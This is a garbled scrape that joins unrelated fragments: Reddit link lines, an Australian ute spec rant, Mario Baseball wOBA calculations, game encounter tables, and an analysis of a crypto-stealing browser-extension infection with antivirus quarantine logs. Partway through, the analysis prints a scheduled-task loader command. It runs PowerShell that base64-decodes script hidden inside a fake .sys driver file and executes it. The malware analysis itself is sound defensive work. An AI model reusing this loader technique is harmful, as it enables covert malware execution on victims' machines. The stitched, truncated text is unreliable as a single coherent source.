submitted by jkl_uxmal to ReverseEngineering [link] [comments]
 | submitted by NerosTie to linux_gaming [link] [comments] |
submitted by Martypx00 to netsec [link] [comments]
submitted by DotFixSoft to ReverseEngineering [link] [comments]
submitted by RandomRedditor44 to fivenightsatfreddys [link] [comments]
submitted by carvehicle to programming [link] [comments]
submitted by cc5alive to nxtcoin [link] [comments]
 | So I have been thinking long and hard about the best way to structure this post due to the large number of questions and conversations that have been had on the subreddit over the last few days especially because there have been a number of articles put out by the lamestream media in regards to utilities and how they are judged. submitted by That_Car_Dude_Aus to CarsAustralia [link] [comments] So I thought I would do this post across a number of metrics. So this is an on-paper comparison between utes. Some ground rules:
On the shitlist too are:
And Isuzu and Mitsubishi Trucks are on the shitlist because I had to call them to get pricing. Ford is on the shitlist as I have to call them to talk to a "Ranger expert". Go fuck yourselves. I want data, not conversation. The eCanter Price was Estimated by CarSales, Mitsubishi refuses to give me a price, and when I called just said “Come in and we’ll discuss pricing”....I'm not driving 60km into town to get a price. Mitsubishi also didn't like the idea of it being downgraded to a car licence, and said it would be 4,495kg "if head office lets us" Further, the 79 Series pricing and specs is unavailable, and even calling Toyota refused to give even the base prices, or a “Starting From” price and they even refused to email me a spec sheet. Seems Toyota has just shut down any info on the current 79’s that are being made and delivered because the new model is coming. Finally, the eT60 has no declared GCM. The chat on the website told me to call a dealer and hand over my details, in the end I called my dealer and all he had in front of him was a GCM that seemed to be copy and pasted of 4,050kg which is the GVM. So if you load it up, you can't tow. Any accessories such as a bullbar take away from your 1,000kg tow capacity. Admittedly, I got to the point where if I couldn't find the data on the manufacturer website, I threw my hands up and went "Fuck it, they don't care about consumers" and gave up. Hence, this is the list when I could get all the relevant data without being fucked around. Anyway, the table: In case Reddit fucks up the table The Table in full, if the Reddit table stuff fucks it up
So, that's a lot of Data, so let's do some sorting! Top 5 Utes by Payload!
Worst 5 Utes by Payload
Best Real Towing Capacity
Worst Real Towing Capacity
Best EconomyI would just like to caveat that some manufacturers posted Urban, some only posted combined, some didn't say what their number was fromElectric
Worst Economy
Best Range
Worst Range
Most pathetic power
MOST POWAAAAAAAAAAAAAAAAAAHHHHHHHHH
Weakest tugs
Best to Tug
How Many Body Parts do you need to sell?Please note that this was another area where Manufacturers liked to Cherry pick data, I am 110% sure that RAM prices are before taxes, and some are Driveaway, that doesn't change the picture too much, as you'll see:
CheapestACE Yewt - $25,995
Best $/kg - Payload
Worst $/kg - Payload
Best $/kg - Towing
Worst $/kg Towing
Most Expensive to Haul Anything $/kgThis is a metric of how much you can haul versus the cost of the vehicle, ergo, these cars are super expensive pekg you can carry and tow
Cheapest Haulers $/kg
Most Powerful for GCM
Least Powerful for GCM
Highest Torque for GCM
Lowest Torque for GCM
SummaryIf you spend your day crunching numbers, you'll be like me and spend hours staring at spreadsheetsHonestly, best ute is the one you like, with the least issues. I wouldn't buy half of the Utes on the list for many reasons. I'm sick of spreadsheets. |
Runners 0 out 1 out 2 out -- -- -- 0.476 0.254 0.097 1B -- -- 0.865 0.508 0.205 -- 2B -- 1.073 0.667 0.308 -- -- 3B 1.272 0.974 0.377 1B 2B -- 1.435 0.902 0.440 1B -- 3B 1.753 1.147 0.500 -- 2B 3B 2.005 1.390 0.548 1B 2B 3B 2.367 1.508 0.767To read this, you would say that at any point in an inning where a team has runners on 1st and 2nd with 1 out, we can, without context, expect them to score an average of .902 runs. To derive these values from scratch, you have to find each time that each of these states happens, add up all the runs that get scored from that point in the inning until the batting team gets 3 outs, then divide by the number of times that state happened. So to make a quick example, lets say there were 25 occurrences in a given year where there were bases loaded and 1 out. We'll say that teams scored a total of 38 runs after that base-out state occurred. 38 runs/25 occurrences = 1.520 expected runs from the bases loaded, 1 out state. There are way more occurrences for each of these states in reality, so we can be pretty confident they're giving us decent expectations.
Runners 0 Outs 1 Out 2 Out -- -- -- 0.702 0.380 0.153 1B -- -- 1.144 0.655 0.297 -- 2B -- 1.284 0.885 0.447 -- -- 3B 1.608 1.111 0.499 1B 2B -- 1.712 1.071 0.493 1B -- 3B 1.904 1.255 0.641 -- 2B 3B 2.165 1.506 0.703 1B 2B 3B 2.588 1.656 0.807When you get this thing filled out, you're able to do cool things like find out the expected run value of a given event. When Nick Pivetta takes the rubber in the top of the 1st on an otherwise nice summer day in Boston and walks the first batter of the game again, the opposing team has moved their run expectancy for the inning from 0.476 to 0.865 (+.389). When he gives up a double to the next batter before you've even found your seat and there's runners on 2nd and 3rd with 0 outs, the opposing team has moved from 0.865 to 2.005 (+1.140). Right when you sit down next to 3 drunk 19 year olds he gives up another double that drives in two runs that moves their expectancy from 2.005 to 1.073 (-0.932 + 2 runs scored = +1.068). But wait -- the value of the first double (1.140) is different from the value of the second double (1.068). What's the true value of a double? This chart just gives the expected value of a base-out state, but lets determine those values next.
BB: .689 HBP: .720 1B: .884 2B: 1.261 3B: 1.601 HR: 2.0722022 Mario Baseball Linear Weights
BB/HBP: .724 1B: .808 2B: 1.189 3B: 1.453 HR: 1.982These charts don't include every possible outcome of an at bat. You can reach by error, hit into a double play, hit a sac fly, bunt, or get any of these outcomes in any number of ways (flying out to the center field warning track probably has a slightly better value than hitting a soft ground ball to the shortstop) -- when you look up Fangraphs wRC+ values, you're probably seeing a value that is incorporating a bit more batted-ball info into its algorithm. This is the core and is absolutely good enough for shitposting in the offseason.
Outcome Count Weight Sum of value bb 130 0.689 89.57 hbp 6 0.72 4.32 1b 87 0.884 76.91 2b 28 1.261 35.31 3b 0 1.601 0 hr 62 2.072 128.46 334.57 pa 696 wOBA: 0.480Judge's true wOBA this year was .458, so we're a tad off, but that's close enough for me to chalk the difference up to not incorporating park factors, double plays, and other types of PA outcomes.
Outcome Count Weight Sum of value bb&hbp 260 0.724 188.24 single 36 0.808 29.09 double 39 1.189 46.37 triple 2 1.453 2.91 HR 66 1.982 130.81 397.42 pa 696 wOBA: 0.571Being hit by a pitch is how most players walk their opponents intentionally in Mario Baseball, so the values are the same for a walk or hbp.
bb 136 0.724 98.464 1b 87 0.808 70.296 2b 28 1.189 33.292 3b 0 1.453 0 hr 62 1.982 122.884 324.936 pa 696 wOBA: 0.4668Bowser in the MLB:
bb+hbp 260 0.689 179.14 1b 36 0.884 31.824 2b 39 1.261 49.179 3b 2 1.601 3.202 hr 66 2.072 136.752 400.097 pa 696 wOBA: 0.5748Judge wRC+ in Mario Baseball: (.4668-.4148/1.0316)/.1757 = .2868 +1 = 1.2868 *100 = 128.7 wRC+ (compared to Bowser's 186.2) A wRC+ of 128 is just above King Boo's 127 and just under Donkey Kong's 130. 6th overall among all characters.
Folder: 10 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\_metadata\generated_indexed_rulesets, Quarantined, 5865, 1082968, , , , , , Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\_metadata, Quarantined, 5865, 1082968, , , , , , Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0, Quarantined, 5865, 1082968, , , , , , Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\MICROSOFT\EDGE\USER DATA\DEFAULT\EXTENSION\EDEMNCDRMPPKBRENLPCKDLJEFFJIJBLN, Quarantined, 5865, 1082968, 1.0.61045, , ame, , , Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0, Quarantined, 5865, 1090470, , , , , , Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION\LMRCCAKLOJBFLLEIKNQECNQECDLOCKCQ, Quarantined, 5865, 1090470, 1.0.61045, , ame, , , Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\_metadata\generated_indexed_rulesets, Quarantined, 5865, 1090470, , , , , , Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\_metadata, Quarantined, 5865, 1090470, , , , , , Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0, Quarantined, 5865, 1090470, , , , , , Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION\IOIBMRBDFJBFECEIKOPRFMIFCDBCBRJQ, Quarantined, 5865, 1090470, 1.0.61045, , ame, , , File: 38 Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\MICROSOFT\EDGE\USER DATA\DEFAULT\EXTENSION\EDEMNCDRMPPKBRENLPCKDLJEFFJIJBLN\3.1.5._0\RULES.JSON, Quarantined, 5865, 1082968, 1.0.61045, , ame, , 4FB6F22DE4F9A3056773E6A39827B547, 1D6845C7B92D6EB70464A35B6075365872C0AE40890133F4D7DD17EA066F8481 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\_metadata\generated_indexed_rulesets\_ruleset1, Quarantined, 5865, 1082968, , , , , 96CD8447C2055A5C002F8F47706D97D2, 126203311363ACC2DB796999DF99FB3ADD785F909F8E68B45DF1CAB55AD07F01 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\128.png, Quarantined, 5865, 1082968, , , , , 913064ADAAA4C4FA2A9D011B66B33183, AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\content.bootstrap.js, Quarantined, 5865, 1082968, , , , , 3043702D6B23363443A9DF78407B90F8, 709AC591BE1095E61721F49A9F2007F2A278F359DD3EA65CBB6712A2AE6B10D9 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\manifest.json, Quarantined, 5865, 1082968, , , , , 59CF96C6B5C8C1FDDF2071B912A7EBE4, 0DE9A23F88B9B7BDA3DA989DCE7AD014112D88100DCEAABCA072D6672522BE26 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_block.js, Quarantined, 5865, 1082968, , , , , 905BF935A59B868AA2A2D86442FA024B, D57FF2FCE1CFFA6AC756532EA611AF4E13933D881D4F5C9352B3431E9404F2BF Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_bnb.js, Quarantined, 5865, 1082968, , , , , 08F76203288898B57B3D02002874FEA0, D8709E509979ECE386EA7DD03FD5E7685E13112A60636A0226B9F1C5A52FDE74 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_cb.js, Quarantined, 5865, 1082968, , , , , FB6445E9B952DE39AE379FD090966771, 5DF3AAFD6B3112751E009000F4F047F1D2CB1B3E7314C2EFC2A281440FD96FFD Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_common.js, Quarantined, 5865, 1082968, , , , , 75E22F62323EF31E43D129C084625F5F, 993E6E0D04542B473306BCE2E283555307573E006460F351ACCE8E5F3A275B34 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_content.js, Quarantined, 5865, 1082968, , , , , BFCF8ED960A918CF0CC8E8EE6CE97F6C, 460626F70555523D2FE223A19E419D120E39F89694D62058E2C8B716B7A1CE76 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_gt.js, Quarantined, 5865, 1082968, , , , , 2AAF609E45C4D99AED5A34D9DCBC9422, C0637893B1F6C2595ADF26D0AFF84544D4F46313243F3D24E6D7CDE89BEDA126 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\webpack_kuc.js, Quarantined, 5865, 1082968, , , , , 620624B8DC850793F37E1EA491935C5E, 78A6DDB94911677B07441FB3E4D951CDBF6C5F36D528D1111610EF86B69B920B Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION\LMRCCAKLOJBFLLEIKNQECNQECDLOCKCQ\5.3.7._0\RULES.JSON, Quarantined, 5865, 1090470, 1.0.61045, , ame, , 4FB6F22DE4F9A3056773E6A39827B547, 1D6845C7B92D6EB70464A35B6075365872C0AE40890133F4D7DD17EA066F8481 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\128.png, Quarantined, 5865, 1090470, , , , , 913064ADAAA4C4FA2A9D011B66B33183, AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\content.bootstrap.js, Quarantined, 5865, 1090470, , , , , 3043702D6B23363443A9DF78407B90F8, 709AC591BE1095E61721F49A9F2007F2A278F359DD3EA65CBB6712A2AE6B10D9 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\manifest.json, Quarantined, 5865, 1090470, , , , , 59CF96C6B5C8C1FDDF2071B912A7EBE4, 0DE9A23F88B9B7BDA3DA989DCE7AD014112D88100DCEAABCA072D6672522BE26 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_block.js, Quarantined, 5865, 1090470, , , , , 905BF935A59B868AA2A2D86442FA024B, D57FF2FCE1CFFA6AC756532EA611AF4E13933D881D4F5C9352B3431E9404F2BF Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_bnb.js, Quarantined, 5865, 1090470, , , , , 08F76203288898B57B3D02002874FEA0, D8709E509979ECE386EA7DD03FD5E7685E13112A60636A0226B9F1C5A52FDE74 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_cb.js, Quarantined, 5865, 1090470, , , , , FB6445E9B952DE39AE379FD090966771, 5DF3AAFD6B3112751E009000F4F047F1D2CB1B3E7314C2EFC2A281440FD96FFD Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_common.js, Quarantined, 5865, 1090470, , , , , 75E22F62323EF31E43D129C084625F5F, 993E6E0D04542B473306BCE2E283555307573E006460F351ACCE8E5F3A275B34 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_content.js, Quarantined, 5865, 1090470, , , , , BFCF8ED960A918CF0CC8E8EE6CE97F6C, 460626F70555523D2FE223A19E419D120E39F89694D62058E2C8B716B7A1CE76 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_gt.js, Quarantined, 5865, 1090470, , , , , 2AAF609E45C4D99AED5A34D9DCBC9422, C0637893B1F6C2595ADF26D0AFF84544D4F46313243F3D24E6D7CDE89BEDA126 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0\webpack_kuc.js, Quarantined, 5865, 1090470, , , , , 620624B8DC850793F37E1EA491935C5E, 78A6DDB94911677B07441FB3E4D951CDBF6C5F36D528D1111610EF86B69B920B Trojan.BitCoinStealer, C:\WINDOWS\SYSTEM32\DRIVERS\QOTOP6\4F0F6187-8D3A-4D9B-8848-E25921799F33.SYS, Quarantined, 3900, 1055561, 1.0.61045, , ame, , 842BB565271B118499304C2CCB07DD28, 8A59A9259522FF2FA06B5F01860862C0D200D8ECEB228E39855FB7C3ACF5D3EF Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION\IOIBMRBDFJBFECEIKOPRFMIFCDBCBRJQ\4.4.6._0\RULES.JSON, Quarantined, 5865, 1090470, 1.0.61045, , ame, , 4FB6F22DE4F9A3056773E6A39827B547, 1D6845C7B92D6EB70464A35B6075365872C0AE40890133F4D7DD17EA066F8481 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\_metadata\generated_indexed_rulesets\_ruleset1, Quarantined, 5865, 1090470, , , , , 96CD8447C2055A5C002F8F47706D97D2, 126203311363ACC2DB796999DF99FB3ADD785F909F8E68B45DF1CAB55AD07F01 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\128.png, Quarantined, 5865, 1090470, , , , , 913064ADAAA4C4FA2A9D011B66B33183, AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\content.bootstrap.js, Quarantined, 5865, 1090470, , , , , 3043702D6B23363443A9DF78407B90F8, 709AC591BE1095E61721F49A9F2007F2A278F359DD3EA65CBB6712A2AE6B10D9 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\manifest.json, Quarantined, 5865, 1090470, , , , , 59CF96C6B5C8C1FDDF2071B912A7EBE4, 0DE9A23F88B9B7BDA3DA989DCE7AD014112D88100DCEAABCA072D6672522BE26 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_block.js, Quarantined, 5865, 1090470, , , , , 905BF935A59B868AA2A2D86442FA024B, D57FF2FCE1CFFA6AC756532EA611AF4E13933D881D4F5C9352B3431E9404F2BF Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_bnb.js, Quarantined, 5865, 1090470, , , , , 08F76203288898B57B3D02002874FEA0, D8709E509979ECE386EA7DD03FD5E7685E13112A60636A0226B9F1C5A52FDE74 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_cb.js, Quarantined, 5865, 1090470, , , , , FB6445E9B952DE39AE379FD090966771, 5DF3AAFD6B3112751E009000F4F047F1D2CB1B3E7314C2EFC2A281440FD96FFD Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_common.js, Quarantined, 5865, 1090470, , , , , 75E22F62323EF31E43D129C084625F5F, 993E6E0D04542B473306BCE2E283555307573E006460F351ACCE8E5F3A275B34 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_content.js, Quarantined, 5865, 1090470, , , , , BFCF8ED960A918CF0CC8E8EE6CE97F6C, 460626F70555523D2FE223A19E419D120E39F89694D62058E2C8B716B7A1CE76 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_gt.js, Quarantined, 5865, 1090470, , , , , 2AAF609E45C4D99AED5A34D9DCBC9422, C0637893B1F6C2595ADF26D0AFF84544D4F46313243F3D24E6D7CDE89BEDA126 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\webpack_kuc.js, Quarantined, 5865, 1090470, , , , , 620624B8DC850793F37E1EA491935C5E, 78A6DDB94911677B07441FB3E4D951CDBF6C5F36D528D1111610EF86B69B920B Trojan.Tasker.Decoder, C:\WINDOWS\SYSTEM32\TASKS\Microsoft\Windows\Management\Provisioning\dBt3Z\AA7B6A15-FAC1-44D8-8B31-AEF280473975, Quarantined, 15659, 1055267, 1.0.61045, , ame, , 08D97ED74B014695C9110418D96472C4, 4DC2C05854644C918AF20E5CE3B255C74D3B126D49D1A548A6D7E4243C451C05 Trojan.BitCoinMiner.E, C:\WINDOWS\SYSTEM32\TASKS\Microsoft\Windows\Management\Provisioning\User, Quarantined, 3659, 1090462, 1.0.61045, , ame, , 934E89A3A99C184F1798775D4BE62CD4, D11427934919F664C3F27DF0E2DAECF71E1667BA6EA46D048832476C09B8F273As you can see, there's a bunch of Chrome and Edge (which are both derived from Chromium) browser extension files that are marked as Trojans, albeit BitcoinMiner as opposed to the BitcoinStealer system32 file. Don't be fooled by that, though. While it's true that antivirus software often labels harmless crypto software as malicious, in this particular case we weren't actually dealing with a legitimate mining extension but a malicious stealing one instead. The user had never installed any mining or crypto-related extensions.
And running that file seems to install the extensions on your Chromium-based browsers. Firefox-based browsers seem to be not affected by this. We figured this out when we were testing if the malware replaced the address in the Tor Browser (based on Firefox) too. It didn't, and no malicious extensions seem to have been present in the Tor browser. However, this is simply because the malware doesn't contain any Firefox extension, as opposed to some built in Firefox security feature. This is an important distinction to make, since Firefox is widely considered to be a secure browser by the general public despite being way behind Chromium in security according to some of the most prominent security researchers in the industry.Internet, Health \Microsoft\Windows\Management\Provisioning\dBt3Z\AA7B6A15-FAC1-44D8-8B31-AEF280473975 true PT59M true PT59M HighestAvailable AA-SURFACE\amer0 InteractiveToken Parallel false false false false false true true false true PT0S 1 wscript.exe /e:vbscript /b "C:\Windows\System32\zYYdBt3ZQs\4AA2C936-A6E9-4413-9AA4-72BE7EF9CFC4" "n; $sc = [System.Text.Encoding]::UTF8.GetString([System.IO.File]::ReadAllBytes('C:\Windows\System32\drivers\QoToP6\4F0F6187-8D3A-4D9B-8848-E25921799F33.sys'), 2183100, 422); $sc2 = [Convert]::FromBase64String($sc); $sc3 = [System.Text.Encoding]::UTF8.GetString($sc2); Invoke-Command ([Scriptblock]::Create($sc3))"
| EX1 | EX2 | EX3 | EX4 | |
|---|---|---|---|---|
| Moves | 33 | 38 | 43 | 66 |
| Tight moves | 3 | 5 | 5 | 20 |
| Observations | 23 | 25 | 25 | 24 |
| Role-based moves | 0 | 6 | 8 | 19 |
| Team-killing moves | 0 | 5 | 3 | 17 |
| Wiping moves | 0 | 0 | 1 | 2 |
| P1S | P2S | ShB EX4 | |
|---|---|---|---|
| Moves | 21 | 26 | 30 |
| Tight moves | 2 | 10 | 8 |
| Observations | 9 | 14 | 14 |
| Role-based moves | 11 | 13 | 6 |
| Team-killing moves | 4 | 13 | 0 |
| Wiping moves | 5 | 9 | 2 |
 | submitted by og-reset to GundamEvolution [link] [comments] |
Folder: 10 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\_metadata\generated_indexed_rulesets, Quarantined, 5865, 1082968, , , , , , Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\_metadata, Quarantined, 5865, 1082968, , , , , , Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0, Quarantined, 5865, 1082968, , , , , , Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\MICROSOFT\EDGE\USER DATA\DEFAULT\EXTENSION\EDEMNCDRMPPKBRENLPCKDLJEFFJIJBLN, Quarantined, 5865, 1082968, 1.0.61045, , ame, , , Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\lmrccaklojbflleiknqecnqecdlockcq\5.3.7._0, Quarantined, 5865, 1090470, , , , , , Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION\LMRCCAKLOJBFLLEIKNQECNQECDLOCKCQ, Quarantined, 5865, 1090470, 1.0.61045, , ame, , , Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\_metadata\generated_indexed_rulesets, Quarantined, 5865, 1090470, , , , , , Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0\_metadata, Quarantined, 5865, 1090470, , , , , , Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Google\Chrome\User Data\Default\Extension\ioibmrbdfjbfeceikoprfmifcdbcbrjq\4.4.6._0, Quarantined, 5865, 1090470, , , , , , Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION\IOIBMRBDFJBFECEIKOPRFMIFCDBCBRJQ, Quarantined, 5865, 1090470, 1.0.61045, , ame, , , File: 38 Trojan.BitCoinMiner.ShrtCln, C:\USERS\AMER0\APPDATA\LOCAL\MICROSOFT\EDGE\USER DATA\DEFAULT\EXTENSION\EDEMNCDRMPPKBRENLPCKDLJEFFJIJBLN\3.1.5._0\RULES.JSON, Quarantined, 5865, 1082968, 1.0.61045, , ame, , 4FB6F22DE4F9A3056773E6A39827B547, 1D6845C7B92D6EB70464A35B6075365872C0AE40890133F4D7DD17EA066F8481 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\_metadata\generated_indexed_rulesets\_ruleset1, Quarantined, 5865, 1082968, , , , , 96CD8447C2055A5C002F8F47706D97D2, 126203311363ACC2DB796999DF99FB3ADD785F909F8E68B45DF1CAB55AD07F01 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\128.png, Quarantined, 5865, 1082968, , , , , 913064ADAAA4C4FA2A9D011B66B33183, AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\content.bootstrap.js, Quarantined, 5865, 1082968, , , , , 3043702D6B23363443A9DF78407B90F8, 709AC591BE1095E61721F49A9F2007F2A278F359DD3EA65CBB6712A2AE6B10D9 Trojan.BitCoinMiner.ShrtCln, C:\Users\amer0\AppData\Local\Microsoft\Edge\User Data\Default\Extension\edemncdrmppkbrenlpckdljeffjijbln\3.1.5._0\manifest.json, Quarantined, 5865, 1082968, , , , , 59CF96C6B5C8C1FDDF2071B912A7EBE4, 